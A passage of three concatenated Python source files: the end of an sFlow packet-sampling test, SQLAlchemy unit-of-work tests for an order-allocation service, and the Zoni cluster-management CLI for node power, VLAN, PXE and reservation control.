"Expected Number of samples are not collected collected from Interface %s in collector %s , Received %s" %(port,collector,data['flow_port_count'][index]))
else:
self.assertTrue(data['flow_port_count'][index] == 0 ,
"Packets are collected from Non Sflow interface %s in collector %s"%(port,collector))
#---------------------------------------------------------------------------
def sendTraffic(self):
src_ip_addr_templ = '192.168.{}.1'
ip_dst_addr = '192.168.0.4'
src_mac = self.dataplane.get_mac(0, 0)
pktlen=100
#send 100 * sampling_rate packets in each interface for better analysis
for j in range(0, 100, 1):
index = 0
for intf in self.interfaces:
ip_src_addr = src_ip_addr_templ.format(str(8 * index))
src_port = self.interfaces[intf]['ptf_indices']
dst_port = self.dst_port
tcp_pkt = simple_tcp_packet(pktlen=pktlen,
eth_dst=self.router_mac,
eth_src=src_mac,
ip_src=ip_src_addr,
ip_dst=ip_dst_addr,
ip_ttl=64)
no_of_packets=self.interfaces[intf]['sample_rate']
send(self,src_port,tcp_pkt,count=no_of_packets)
index+=1
pktlen += 10 # send traffic with different packet sizes
#--------------------------------------------------------------------------
def runTest(self):
self.generate_ArpResponderConfig()
time.sleep(1)
self.stop_collector=False
thr1 = threading.Thread(target=self.collector_0)
thr2 = threading.Thread(target=self.collector_1)
thr1.start()
time.sleep(2)
thr2.start()
#wait for the collectors to initialise
time.sleep(5)
pktlen=100
if self.poll_tests:
if self.polling_int==0:
time.sleep(20)
else:
#wait for polling time for collector to collect packets
logging.info("Waiting for % seconds of polling interval"%self.polling_int)
time.sleep(self.polling_int)
else:
self.sendTraffic()
time.sleep(10) # For Test Stability
self.stop_collector = True
thr1.join()
thr2.join()
logging.debug(self.collector0_samples)
logging.debug(self.collector1_samples)
self.packet_analyzer(self.collector0_samples,'collector0',self.poll_tests)
self.packet_analyzer(self.collector1_samples,'collector1',self.poll_tests)
|
test_uow.py
|
# pylint: disable=broad-except, too-many-arguments
import threading
import time
import traceback
from typing import List
from unittest.mock import Mock
import pytest
from allocation.domain import model
from allocation.service_layer import unit_of_work
from ..random_refs import random_sku, random_batchref, random_orderid
pytestmark = pytest.mark.usefixtures('mappers')
def insert_batch(session, ref, sku, qty, eta, product_version=1):
session.execute(
'INSERT INTO products (sku, version_number) VALUES (:sku, :version)',
dict(sku=sku, version=product_version),
)
session.execute(
'INSERT INTO batches (reference, sku, _purchased_quantity, eta)'
' VALUES (:ref, :sku, :qty, :eta)',
dict(ref=ref, sku=sku, qty=qty, eta=eta)
)
def get_allocated_batch_ref(session, orderid, sku):
[[orderlineid]] = session.execute(
'SELECT id FROM order_lines WHERE orderid=:orderid AND sku=:sku',
dict(orderid=orderid, sku=sku)
)
[[batchref]] = session.execute(
'SELECT b.reference FROM allocations JOIN batches AS b ON batch_id = b.id'
' WHERE orderline_id=:orderlineid',
dict(orderlineid=orderlineid)
)
return batchref
def test_uow_can_retrieve_a_batch_and_allocate_to_it(sqlite_session_factory):
session = sqlite_session_factory()
insert_batch(session, 'batch1', 'HIPSTER-WORKBENCH', 100, None)
session.commit()
uow = unit_of_work.SqlAlchemyUnitOfWork(sqlite_session_factory)
with uow:
product = uow.products.get(sku='HIPSTER-WORKBENCH')
line = model.OrderLine('o1', 'HIPSTER-WORKBENCH', 10)
product.allocate(line)
uow.commit()
batchref = get_allocated_batch_ref(session, 'o1', 'HIPSTER-WORKBENCH')
assert batchref == 'batch1'
def test_rolls_back_uncommitted_work_by_default(sqlite_session_factory):
uow = unit_of_work.SqlAlchemyUnitOfWork(sqlite_session_factory)
with uow:
insert_batch(uow.session, 'batch1', 'MEDIUM-PLINTH', 100, None)
new_session = sqlite_session_factory()
rows = list(new_session.execute('SELECT * FROM "batches"'))
assert rows == []
def test_rolls_back_on_error(sqlite_session_factory):
class MyException(Exception):
pass
uow = unit_of_work.SqlAlchemyUnitOfWork(sqlite_session_factory)
with pytest.raises(MyException):
with uow:
insert_batch(uow.session, 'batch1', 'LARGE-FORK', 100, None)
raise MyException()
new_session = sqlite_session_factory()
rows = list(new_session.execute('SELECT * FROM "batches"'))
assert rows == []
def try_to_allocate(orderid, sku, exceptions, session_factory):
line = model.OrderLine(orderid, sku, 10)
try:
with unit_of_work.SqlAlchemyUnitOfWork(session_factory) as uow:
product = uow.products.get(sku=sku)
product.allocate(line)
time.sleep(0.2)
uow.commit()
except Exception as e: # pylint: disable=broad-except
print(traceback.format_exc())
exceptions.append(e)
def test_concurrent_updates_to_version_are_not_allowed(postgres_session_factory):
sku, batch = random_sku(), random_batchref()
session = postgres_session_factory()
insert_batch(session, batch, sku, 100, eta=None, product_version=1)
session.commit()
order1, order2 = random_orderid(1), random_orderid(2)
exceptions = [] # type: List[Exception]
try_to_allocate_order1 = lambda: try_to_allocate(
order1, sku, exceptions, postgres_session_factory
)
try_to_allocate_order2 = lambda: try_to_allocate(
order2, sku, exceptions, postgres_session_factory
)
thread1 = threading.Thread(target=try_to_allocate_order1)
thread2 = threading.Thread(target=try_to_allocate_order2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
[[version]] = session.execute(
"SELECT version_number FROM products WHERE sku=:sku",
dict(sku=sku),
)
assert version == 2
[exception] = exceptions
assert 'could not serialize access due to concurrent update' in str(exception)
orders = list(session.execute(
"SELECT orderid FROM allocations"
" JOIN batches ON allocations.batch_id = batches.id"
" JOIN order_lines ON allocations.orderline_id = order_lines.id"
" WHERE order_lines.sku=:sku",
dict(sku=sku),
))
assert len(orders) == 1
with unit_of_work.SqlAlchemyUnitOfWork(postgres_session_factory) as uow:
uow.session.execute('select 1')
|
zoni-cli.py
|
#! /usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import optparse
import socket
import logging.config
import getpass
import os
import sys
import re
import string
import subprocess
#from zoni import *
#from zoni.data.resourcequerysql import ResourceQuerySql
#import zoni
#from zoni.data.resourcequerysql import *
from zoni.bootstrap.pxe import Pxe
from zoni.hardware.ipmi import Ipmi
from zoni.hardware.dellswitch import HwDellSwitch
from zoni.hardware.raritanpdu import raritanDominionPx
from zoni.hardware.delldrac import dellDrac
import zoni.hardware.systemmanagement
from zoni.data import usermanagement
from zoni.agents.dhcpdns import DhcpDns
from zoni.extra.util import validIp, validMac, getConfig
from zoni.version import version, revision
from tashi.util import instantiateImplementation
#import zoni.data.usermanagement
#from usermanagement import UserManagement
# Extensions from MIMOS
from zoni.extensions.m_extensions import *
def parseTable():
pass
def main():
""" Main """
ver = version.split(" ")[0]
rev = revision
(configs, configFiles) = getConfig()
logging.config.fileConfig(configFiles)
#log = logging.getLogger(os.path.basename(__file__))
#logit(configs['logFile'], "Starting Zoni client")
#logit(configs['logFile'], "Loading config file")
parser = optparse.OptionParser(usage="%prog [-n] [-u] [--uid] [-v]", version="%prog " + ver + " " + rev)
parser.add_option("-n", "--nodeName", dest="nodeName", help="Specify node")
parser.add_option("--switchPort", "--switchport", dest="switchPort", help="Specify switchport switchname:portnum")
parser.add_option("-u", "--userName", dest="userName", help="Specify user name")
parser.add_option("--uid", dest="uid", help="Specify user id")
parser.add_option("-v", "--verbose", dest="verbosity", help="Be verbose", action="store_true", default=False)
parser.add_option("--Name", "--name", dest="Name", help="Specify name of entry")
parser.add_option("--Show", "--show", dest="show", help="Show something", default=None, action="store_true")
parser.add_option("-d", "--domain", dest="domain", help="Work with this domain")
parser.add_option("--notes", "--Notes", dest="myNotes", help="Notes", default="")
parser.add_option("--force", dest="forcefully", help="Apply gentle pressure", default=False, action="store_true")
# Hardware controller
group = optparse.OptionGroup(parser, "Hardware control", "Options for node power control")
group.add_option("--hw", dest="hardwareType", help="Make hardware call to ipmi|drac|pdu")
group.add_option("--powerStatus", "--powerstatus", dest="POWERSTATUS", help="Get power status on node", action="store_true", default=False)
group.add_option("--reboot", "--reboot", dest="REBOOTNODE", help="Reboot node (Soft)", action="store_true", default=False)
group.add_option("--powerCycle", "--powercycle", dest="POWERCYCLE", help="Power Cycle (Hard)", action="store_true", default=False)
group.add_option("--powerOff", "--poweroff", dest="POWEROFF", help="Power off node", action="store_true", default=False)
group.add_option("--powerOffSoft", "--poweroffsoft", dest="POWEROFFSOFT", help="Power off node (soft)", action="store_true", default=False)
group.add_option("--powerOn", "--poweron", dest="POWERON", help="Power on node", action="store_true", default=False)
group.add_option("--powerReset", "--powerreset", dest="POWERRESET", help="Power reset node", action="store_true", default=False)
group.add_option("--console", dest="CONSOLE", help="Console mode", action="store_true", default=False)
# Extensions from MIMOS - specific only for HP Blades and HP c7000 Blade Enclosures
group.add_option("--powerOnNet", "--poweronnet", dest="POWERONENET", help="Power on Node into PXE (Currently support on HP Blades through HP c7000 Blade Enclosure)", action="store_true", default=False)
parser.add_option_group(group)
# Query Interface
group = optparse.OptionGroup(parser, "Query Interface", "Query current systems and allocations")
group.add_option("-R", "--showReservation", "--showreservation", dest="showReservation", help="Show current node reservations", action="store_true", default=False)
group.add_option("-A", "--showAllocation", "--showallocation", dest="showAllocation", help="Show current node allocation", action="store_true", default=False)
group.add_option("-S", "--showResources", dest="showResources", help="Show available resources to choose from", action="store_true", default=False)
group.add_option("--getResources", "--getresources", dest="getResources", help="Get available resources to choose from", action="store_true", default=False)
group.add_option("-p", "--procs", dest="numProcs", help="Set number of processors" )
group.add_option("-c", "--clock", dest="clockSpeed", help="Processor clock" )
group.add_option("--memory", dest="numMemory", help="Amount of memory (Bytes)" )
group.add_option("-f", "--cpuflags", dest="cpuFlags", help="CPU flags" )
group.add_option("--cores", dest="numCores", help="Number of Cores" )
group.add_option("-I", "--showPxeImages", "--showpxeimages", dest="showPxeImages", help="Show available PXE images to choose from", action="store_true", default=False)
group.add_option("-M", "--showPxeImageMap", "--showpxeimagemap", dest="showPxeImageMap", help="Show PXE images host mapping", action="store_true", default=False)
parser.add_option_group(group)
#parser.add_option("-p", "--printResources", dest="printResources", help="Print available resources to choose from", action="store_true", default=False)
# Admin Interface
group = optparse.OptionGroup(parser, "Admin Interface", "Administration Interface:")
group.add_option("--admin", dest="ADMIN", help="Enter Admin mode", action="store_true", default=False)
group.add_option("--setPortMode", "--setportmode", dest="setPortMode", help="Set port mode to access, trunk, or general")
group.add_option("--enableHostPort", "--enablehostport", dest="enableHostPort", help="Enable a switch port", action="store_true", default=False)
group.add_option("--disableHostPort", "--disablehostport", dest="disableHostPort", help="Disable a switch port", action="store_true", default=False)
group.add_option("--destroyVlan", "--destroyvlan", dest="destroyVlanId", help="Remove vlan from all switches")
group.add_option("--createVlan", "--createvlan", dest="createVlanId", help="Create a vlan on all switches")
group.add_option("--addNodeToVlan", "--addnodetovlan", dest="add2Vlan", help="Add node to a vlan (:tagged)")
group.add_option("--removeNodeFromVlan", "--removenodefromvlan", dest="removeFromVlan", help="Remove node from a vlan")
group.add_option("--setNativeVlan", "--setnativevlan", dest="setNative", help="Configure native vlan")
group.add_option("--restoreNativeVlan", "--restorenativevlan", dest="restoreNative", help="Restore native vlan", action="store_true", default=False)
group.add_option("--removeAllVlans", "--removeallvlans", dest="removeAllVlans", help="Removes all vlans from a switchport", action="store_true", default=False)
group.add_option("--sendSwitchCommand", "--sendswitchcommand", dest="sendSwitchCommand", help="Send Raw Switch Command, VERY DANGEROUS. config;interface switchport ethernet g14;etc")
group.add_option("--interactiveSwitchConfig", "--interactiveswitchconfig", dest="interactiveSwitchConfig", help="Interactively configure a switch. switchhname")
group.add_option("--showSwitchConfig", "--showswitchconfig", dest="showSwitchConfig", help="Show switch config for node", action="store_true", default=False)
group.add_option("--register", dest="register", help="Register hardware to Zoni", action="store_true", default=False)
group.add_option("--labelPort", dest="labelPort", help="Label switch port", action="store_true", default=False)
group.add_option("--saveConfig", dest="saveConfig", help="SWITCHNAME - Save Switch Config")
parser.add_option_group(group)
# Switch
#group = optparse.OptionGroup(parser, "Switch Interface", "Switch Interface:")
#group.add_option("--rawswitch", dest="RAWSWITCH", help="Enter RAW Switch Admin mode", action="store_true", default=False)
#group.add_option("--enablePort", "--enableport", dest="enablePort", help="Enable a port on the switch")
#group.add_option("--disablePort", "--disableport", dest="disablePort", help="Disable a port on the switch")
#group.add_option("--addVlanToTrunks", "--addvlantotrunks", dest="addVlanToTrunks", help="")
# Domain Interface
group = optparse.OptionGroup(parser, "Domain Interface", "Manage Zoni Domain:")
group.add_option("-D", "--showDomains", "--showdomains", dest="showDomains", help="Show Zoni domains", action="store_true", default=False)
group.add_option("--addDomain", "--adddomain", dest="addDomain", help="Add new domain to Zoni", action="store_true", default=False)
group.add_option("--removeDomain", "--removedomain", dest="removeDomain", help="remove a domain from Zoni", action="store_true", default=False)
group.add_option("-V", "--showVlans", "--showvlans", dest="showVlans", help="Show an from Zoni", action="store_true", default=False)
#group.add_option("--addVlan", "--addvlan", dest="addVlan", help="Add new vlan to Zoni", action="store_true", default=False)
#group.add_option("--removeVlan", "--removevlan", dest="removeVlan", help="Remove an from Zoni", action="store_true", default=False)
group.add_option("--assignVlan", "--assignvlan", dest="assignVlan", help="Assign vlan to a domain")
parser.add_option_group(group)
# Allocation Interface
group = optparse.OptionGroup(parser, "Allocation Interface", "Change current systems allocations:")
#group.add_option("--addReservation", "--addreservation", dest="addReservation", help="Add a Reservation", action="store_true", default=False)
group.add_option("--addImage", "--addimage", dest="addImage", help="Add image to Zoni - amd64-image:dist:dist_ver")
group.add_option("--delImage", "--delimage", dest="delImage", help="Delete PXE image")
#group.add_option("--addPxeImage", "--addpxeimage", dest="imageName", help="Add PXE image to database", action="store_true", default=False)
group.add_option("--assignImage", "--assignimage", dest="assignImage", help="Assign image to resource")
group.add_option("--imageName", "--imagename", dest="imageName", help="Assign image to resource")
group.add_option("--allocateNode", "--allocatenode", dest="allocateNode", help="Assign node to a user", action="store_true", default=False)
group.add_option("--vlaninfo", "--vlanInfo", dest="vlanInfo", help="Specify vlan info for allocation")
group.add_option("--vlanIsolate", "--vlanisolate", dest="vlanIsolate", help="Specify vlan for network isolation")
group.add_option("--hostName", "--hostname", dest="hostName", help="Specify hostname for node")
group.add_option("--ipaddr", dest="ipAddr", help="Specify ip address for node")
group.add_option("--releaseNode", "--releasenode", dest="releaseNode", help="Release current node allocation", action="store_true", default=False)
group.add_option("--reservationDuration", "--reservationduration", dest="reservationDuration", help="Specify duration of node reservation - YYYYMMDD format")
group.add_option("-r", "--reservationId", "--reservationid", dest="reservationId", help="Reservation ID")
group.add_option("--updateReservation", "--updatereservation", dest="updateReservation", help="Update Reservation", action="store_true", default=False)
group.add_option("--delReservation", "--delreservation", dest="delReservation", help="Delete Reservation")
group.add_option("--rgasstest", dest="rgasstest", help="Debug testing function", action="store_true", default=False)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Reservation Interface", "Change current systems reservations:")
group.add_option("--createReservation", "--createreservation", dest="createReservation", help="Create a new Reservation", action="store_true", default=False)
parser.add_option_group(group)
# Zoni Helpers
group = optparse.OptionGroup(parser, "Zoni Helpers", "Helper functions:")
group.add_option("--addDns", dest="addDns", help="Add a DNS entry", action="store_true", default=False)
group.add_option("--removeDns", dest="removeDns", help="Remove a DNS entry", action="store_true", default=False)
group.add_option("--addCname", dest="addCname", help="Add a DNS Cname entry", action="store_true", default=False)
group.add_option("--removeCname", dest="removeCname", help="Remove a DNS Cname entry", action="store_true", default=False)
group.add_option("--addDhcp", dest="addDhcp", help="Add a DHCP entry", action="store_true", default=False)
group.add_option("--removeDhcp", dest="removeDhcp", help="Remove a DHCP entry", action="store_true", default=False)
parser.add_option_group(group)
# Extensions from MIMOS
group = optparse.OptionGroup(parser, "Zoni MIMOS Extensions", "Special Functions created by MIMOS Lab:")
group.add_option("--addRole", "--addrole", dest="addRole", help="Create a disk based installation default file for a node based on its role or function, e.g. one|oned|cc|clc|walrus|sc|nc|preseed|kickstart", default=None, action="store")
group.add_option("--removeRole", "--removerole", dest="removeRole", help="Remove the default file of a node", action="store_true", default=False)
group.add_option("--showRoleMap", dest="showRoleMap", help="Show Role to Host Mapping", action="store_true", default=False)
group.add_option("--showKernel", dest="showKernelInfo", help="Show Kernel Info", action="store_true", default=False)
group.add_option("--showInitrd", dest="showInitrdInfo", help="Show Initrd Info", action="store_true", default=False)
group.add_option("--registerKernelInitrd", dest="registerKernelInitrd", help="Register Kernel and Initrd - vmlinuz:vmlinuz-ver:vmlinuz-arch:initrd:initrd-arch:imagename")
group.add_option("--getKernelInitrdID", dest="getKernelInitrdID", help="Get corresponding Kernel and Initrd Info - vmlinuz:initrd:arch")
group.add_option("--getConfig", dest="getConfig", help="Get a value from ZoniDefault.cfg - e.g. tftpRootDir, initrdRoot, kernelRoot, fsImagesBaseDir, etc.", default=None, action="store")
parser.add_option_group(group)
(options, args) = parser.parse_args()
cmdargs = {}
# setup db connection
#print "starting tread"
#threading.Thread(daemon=True, target=self.dbKeepAlive()).start()
#print "after tread"
data = instantiateImplementation("zoni.data.resourcequerysql.ResourceQuerySql", configs, options.verbosity)
reservation = instantiateImplementation("zoni.data.reservation.reservationMysql", configs, data, options.verbosity)
#query = zoni.data.resourcequerysql.ResourceQuerySql(configs, options.verbosity)
# Extensions from MIMOS
mimos = instantiateImplementation("zoni.extensions.m_extensions.mimos",configs)
# Get host info
host=None
if options.nodeName:
host = data.getHostInfo(options.nodeName)
#print host
# Hardware control
if options.hardwareType and options.nodeName:
host = data.getHostInfo(options.nodeName)
if options.hardwareType == "ipmi":
#hardware = zoni.hardware.systemmanagement.SystemManagement(configs,data)
hw = Ipmi(configs, options.nodeName, host)
#
if options.hardwareType == "pdu":
hw = raritanDominionPx(configs, options.nodeName, host)
#
if options.hardwareType == "drac":
## Check if node has drac card
if "drac_name" in host:
hw= dellDrac(configs, options.nodeName, host)
else:
mesg = "Host (%s) does not have a DRAC card!!\n" % options.nodeName
sys.stdout.write(mesg)
exit(1)
## Extensions from MIMOS - For Dell Blades - calling Dell Blades via the Blade Enclosure, some DRAC commands are slightly different from the ones in blade enclosure when compared to those in the actual blade, this allow a bit more flexiblity and standard calls to the blades
if options.hardwareType == "dracblade":
hw = dellBlade(configs, options.nodeName, host)
## Extensions from MIMOS - For HP Blades - calling HP Blades via the HP c7000 Blade Enclosure instead of direct to the blade server itself, this allow a bit more flexiblity and standard calls to the blades
if options.hardwareType == "hpilo":
hw = hpILO(configs, options.nodeName, host)
if (options.REBOOTNODE or options.POWERCYCLE or options.POWEROFF or options.POWEROFFSOFT or \
options.POWERON or options.POWERSTATUS or options.CONSOLE or \
options.POWERONNET or options.POWERRESET) and options.nodeName: # Extensions from MIMOS - added POWERONNET
if options.verbosity:
hw.setVerbose(True)
if options.REBOOTNODE:
hw.powerReset()
exit()
if options.POWERCYCLE:
hw.powerCycle()
exit()
if options.POWEROFF:
hw.powerOff()
exit()
if options.POWEROFFSOFT:
hw.powerOffSoft()
exit()
if options.POWERON:
hw.powerOn()
exit()
if options.POWERRESET:
hw.powerReset()
exit()
if options.POWERSTATUS:
hw.getPowerStatus()
exit()
if options.CONSOLE:
hw.activateConsole()
exit()
## Extensions from MIMOS - For HP Blade via c7000 Blade Enclosure
if options.POWERONNET:
hw.powerOnNet()
exit()
hw.getPowerStatus()
exit()
else:
hw = zoni.hardware.systemmanagement.SystemManagement(configs,data)
if (options.REBOOTNODE or options.POWERCYCLE or options.POWEROFF or options.POWEROFFSOFT or \
options.POWERON or options.POWERSTATUS or options.CONSOLE or \
options.POWERRESET) and options.nodeName:
if options.verbosity:
hw.setVerbose(True)
if options.REBOOTNODE:
hw.powerReset(options.nodeName)
exit()
if options.POWERCYCLE:
hw.powerCycle(options.nodeName)
exit()
if options.POWEROFFSOFT:
hw.powerOffSoft(options.nodeName)
exit()
if options.POWEROFF:
hw.powerOff(options.nodeName)
exit()
if options.POWERON:
hw.powerOn(options.nodeName)
exit()
if options.POWERRESET:
hw.powerReset(options.nodeName)
exit()
if options.POWERSTATUS:
hw.getPowerStatus(options.nodeName)
exit()
if options.CONSOLE:
hw.activateConsole(options.nodeName)
exit()
hw.getPowerStatus(options.nodeName)
if (options.REBOOTNODE or options.POWERCYCLE or options.POWEROFF or \
options.POWERON or options.POWERSTATUS or options.CONSOLE or \
options.POWERRESET) and not options.nodeName:
parser.print_help()
mesg = "\nMISSSING OPTION: Node name required -n or --nodeName\n"
print mesg
exit()
# Query Interface
if (options.numProcs):
cmdargs["num_procs"] = options.numProcs
if (options.numMemory):
cmdargs["mem_total"] = options.numMemory
if (options.clockSpeed):
cmdargs["clock_speed"] = options.clockSpeed
if (options.numCores):
cmdargs["num_cores"] = options.numCores
if (options.cpuFlags):
cmdargs["cpu_flags"] = options.cpuFlags
if (options.nodeName):
cmdargs["sys_id"] = options.nodeName
if (options.numCores or options.clockSpeed or options.numMemory or options.numProcs or options.cpuFlags) and not options.showResources:
usage = "MISSING OPTION: When specifying hardware parameters, you need the -s or --showResources switch"
print usage
parser.print_help()
exit()
if options.getResources:
print "ALL resources"
print data.getAvailableResources()
key = "3Lf7Qy1oJZue1q/e3ZQbfg=="
print "Tashi Resources"
print data.getMyResources(key)
# Show current allocations
if (options.showAllocation) or (options.show and re.match(".lloca.*", args[0])):
if options.uid:
nameorid = int(options.uid)
else:
nameorid = options.userName
data.showAllocation(nameorid)
exit()
# Show current reservation
if options.showReservation or (options.show and re.match(".eserv.*", args[0])):
if options.uid:
nameorid = int(options.uid)
else:
nameorid = options.userName
data.showReservation(nameorid)
# Print all Resources
if options.showResources or (options.show and re.match(".esour.*", args[0])):
data.showResources(cmdargs)
# Show PXE images
#if (options.show and re.match(".esour.*", args[0])):
if options.showPxeImages or (options.show and re.match("pxei.*", args[0])):
data.showPxeImages()
# Show machine to PXE image mapping
if options.showPxeImageMap or (options.show and re.match("pxem.*", args[0])):
data.showPxeImagesToSystemMap(cmdargs)
if (len(sys.argv) == 1):
parser.print_help()
exit()
# Delete reservation
if (options.delReservation):
data.removeReservation(options.delReservation)
exit()
# Specify usermanagement, ldap or files
if configs['userManagement'] == "ldap":
usermgt = usermanagement.ldap()
elif configs['userManagement'] == "files":
usermgt = usermanagement.files()
else:
print "User management problem"
exit()
if (options.rgasstest):
#data.getHardwareCapabilities(options.nodeName)
#pdu = raritanDominionPx(host)
#print pdu
#bootit = pxe.Pxe(configs, options.verbosity)
#bootit.createPxeUpdateFile(data.getPxeImages())
#bootit.updatePxe()
#print "host is ", host
#drac = dellDrac("drac-r2r1c3", 1)
drac = dellDrac(configs, options.nodeName, host)
#drac.getPowerStatus()
#drac.powerOff()
#drac.powerOn()
#drac.powerCycle()
drac.setVerbose(options.verbosity)
drac.powerReset()
#drac.getPowerStatus()
#print "host is ", host
#pdu = raritanDominionPx(configs, options.nodeName, host)
#print "pdu", pdu
#pdu.getPowerStatus()
#exit()
# Create a reservation for a user
if (options.createReservation):
if not (options.userName or options.uid):
mesg = "ERROR: CreateReservation requires the following arguments...\n"
if not (options.userName or options.uid):
mesg += " Username: --userName=username or --uid 1000\n"
mesg += " Reservation Duration: --reservationDuration YYYYMMDD or numdays(optional, default 15 days)\n"
mesg += " Notes: --notes(optional)\n"
sys.stderr.write(mesg)
exit()
userId = options.uid
if not userId:
userId = usermgt.getUserId(options.userName)
if userId:
__reservationId = reservation.createReservation(userId, options.reservationDuration, options.myNotes + " " + str(string.join(args[0:len(args)])))
else:
print "user doesn't exist"
exit()
# Allocate node to user
if (options.allocateNode):
if options.reservationId and options.domain and options.vlanInfo and options.nodeName and options.imageName:
host = data.getHostInfo(options.nodeName)
# optparse does not pass multiple args that are quoted anymore?
# Used to work with python 2.5.2. Doesn't work with python 2.6.5.
data.allocateNode(options.reservationId, options.domain, host['sys_id'], options.vlanInfo, options.imageName, options.hostName, options.myNotes + " " + str(string.join(args[0:len(args)])))
else:
mesg = "USAGE: %s --allocateNode --nodeName nodeName --domain domainname --reservationId ID --vlanInfo vlanNums:info, --imageName imagename [--notes]\n" % (sys.argv[0])
mesg += "Options\n"
mesg += " --domain testdomain\n"
mesg += " --reservationId 10\n"
mesg += " --vlanInfo 999:native,1000:tagged,1001:tagged\n"
mesg += " --imageName imageName (see available images with 'zoni -I')\n"
mesg += " --hostName mynode01 (optional)\n"
mesg += " --notes \"your notes here \"(optional)\n"
sys.stdout.write(mesg)
exit()
if not (options.reservationId) or not options.nodeName:
mesg = "ERROR: AllocateNode requires the following arguments...\n"
if not (options.nodeName):
mesg += " NodeName: --nodeName r1r1u25 \n"
if not (options.reservationId):
mesg += " ReservationId: --reservationId IDNUM(add nodes to an existing reservation)\n"
mesg += " Hostname: --hostName mynode01\n"
mesg += " Domain: --vlanIsolate vlan_num(default 999)\n"
mesg += " IP address: --ipaddr 172.17.10.100\n"
mesg += " Notes: --notes(optional)\n"
sys.stderr.write(mesg)
exit()
# Reconfigure switchports
memberMap = data.getDomainMembership(host['sys_id'])
HwSwitch = HwDellSwitch
hwswitch = HwSwitch(configs, host)
for vlan, tag in memberMap.iteritems():
hwswitch.addNodeToVlan(vlan, tag)
# Register node in DNS
if options.hostName:
# Add cname
cmd = "zoni --addCname %s %s" % (options.hostName, host['location'])
subprocess.Popen(string.split(cmd))
#data.allocateNode(options.reservationId, options.domain, host['sys_id'], options.vlanInfo, options.imageName, options.hostName, options.myNotes + " " + str(string.join(args[0:len(args)])))
#data.allocateNode(options.reservationId, host['sys_id'], options.hostName, vlanNum, options.ipAddr, options.myNotes)
exit()
# Update allocation
if (options.updateReservation):
if not options.reservationId:
mesg = "ERROR: UpdateReservation requires the following arguments...\n"
if not (options.reservationId):
mesg += " Reservation ID: --reservationId RES\n"
mesg += " NodeName: --nodeName r1r1u25 (optional)\n"
mesg += " Username: --userName=username or --uid 1000 (optional)\n"
mesg += " Reservation Duration: --reservationDuration YYYYMMDD or numdays (optional, default 15 days)\n"
mesg += " Vlan: --vlanIsolate vlan_num(optional)\n"
mesg += " Notes: --notes(optional)\n"
sys.stderr.write(mesg)
exit()
userId = None
if options.uid or options.userName:
# Get the username from uid
userId = options.uid
if not options.uid:
userId = usermgt.getUserId(options.userName)
data.updateReservation(options.reservationId, userId, options.reservationDuration, options.vlanIsolate, options.myNotes)
# Release node allocation
if (options.releaseNode):
if not options.nodeName:
mesg = "ERROR: releaseNode requires the following arguments...\n"
if not (options.nodeName):
mesg += " NodeName: --nodeName r1r1u25 \n"
sys.stderr.write(mesg)
exit()
data.releaseNode(options.nodeName)
# Assign image to host
if (options.assignImage):
if not options.nodeName:
usage = "Node not specified. Please specify a node with --nodeName or -n"
print usage
exit()
# need to fix this later
#if data.assignImagetoHost(host, options.assignImage):
#print "ERROR"
#exit()
# Update PXE
bootit = Pxe(configs, data, options.verbosity)
bootit.setBootImage(host['mac_addr'], options.assignImage)
#bootit.createPxeUpdateFile(data.getPxeImages())
#bootit.updatePxe()
# Add image to database
if (options.addImage):
data.addImage(options.addImage)
# Delete PXE image
if (options.delImage):
data.delImage(options.delImage)
# Domain interface
if (options.showDomains):
data.showDomains()
if (options.addDomain):
if len(args) > 2 and options.vlanInfo:
data.addDomain(args[0], string.join(args[1:len(args)]), options.vlanInfo)
else:
mesg = "USAGE: %s --addDomain domainname \"domain desc\" --vlanInfo vlan:type,vlan:type\n" % (sys.argv[0])
mesg += "Options\n\n --vlanInfo 999:native,1000:untagged,1001:tagged\n"
sys.stdout.write(mesg)
exit()
if (options.removeDomain):
if len(args) > 0:
data.removeDomain(args[0])
else:
mesg = "USAGE: %s --removeDomain domainname \n" % (sys.argv[0])
sys.stdout.write(mesg)
exit()
if (options.showVlans):
data.showVlans()
#if (options.addVlan):
#print len(args)
#if len(args) > 0:
#data.addVlan(args[0], string.join(args[1:len(args)]))
#else:
#mesg = "USAGE: %s --addVlan vlanNumber [VlanDesc]\n" % (sys.argv[0])
#sys.stdout.write(mesg)
#exit()
#if (options.removeVlan):
#if len(args) > 0:
#data.removeVlan(args[0])
#else:
#mesg = "USAGE: %s --removeVlan VlanNumber\n" % (sys.argv[0])
#sys.stdout.write(mesg)
#exit()
if (options.assignVlan):
print len(args)
if len(args) > 0:
data.assignVlan(options.assignVlan, args[0], options.forcefully)
else:
mesg = "USAGE: %s --assignVlan vlannum DomainName\n" % (sys.argv[0])
sys.stdout.write(mesg)
exit()
# Admin Interface
# snmpwalk -v2c -c zoni-domain sw0-r1r1 .1.3.6.1.2.1.17.7.1.4.3.1.5
if (options.ADMIN):
if not options.nodeName and not options.createVlanId and not options.destroyVlanId and not options.switchPort and not options.interactiveSwitchConfig and not options.saveConfig:
mesg = "\nERROR: nodeName or switch not specified. Please specify nodename with -n or --nodeName or --switchport\n"
parser.print_help()
sys.stderr.write(mesg)
exit()
# We can specify port/switch combinations here
if options.switchPort:
host = data.getSwitchInfo(options.switchPort.split(":")[0])
if len(options.switchPort.split(":")) > 1:
host['hw_port'] = options.switchPort.split(":")[1]
host['location'] = options.switchPort
if options.interactiveSwitchConfig:
host = data.getSwitchInfo(options.interactiveSwitchConfig)
HwSwitch = HwDellSwitch
hwswitch = HwSwitch(configs, host)
if options.verbosity:
hwswitch.setVerbose(True)
if options.setPortMode:
hwswitch.setPortMode(options.setPortMode)
if options.saveConfig:
hwswitch.saveConfig(options.saveConfig, data)
if options.labelPort:
mydesc = None
if len(args) > 0:
mydesc = " ".join(["%s" % i for i in args])
hwswitch.labelPort(mydesc)
if options.enableHostPort and (options.nodeName or options.switchPort):
hwswitch.enableHostPort()
if options.disableHostPort and (options.nodeName or options.switchPort):
hwswitch.disableHostPort()
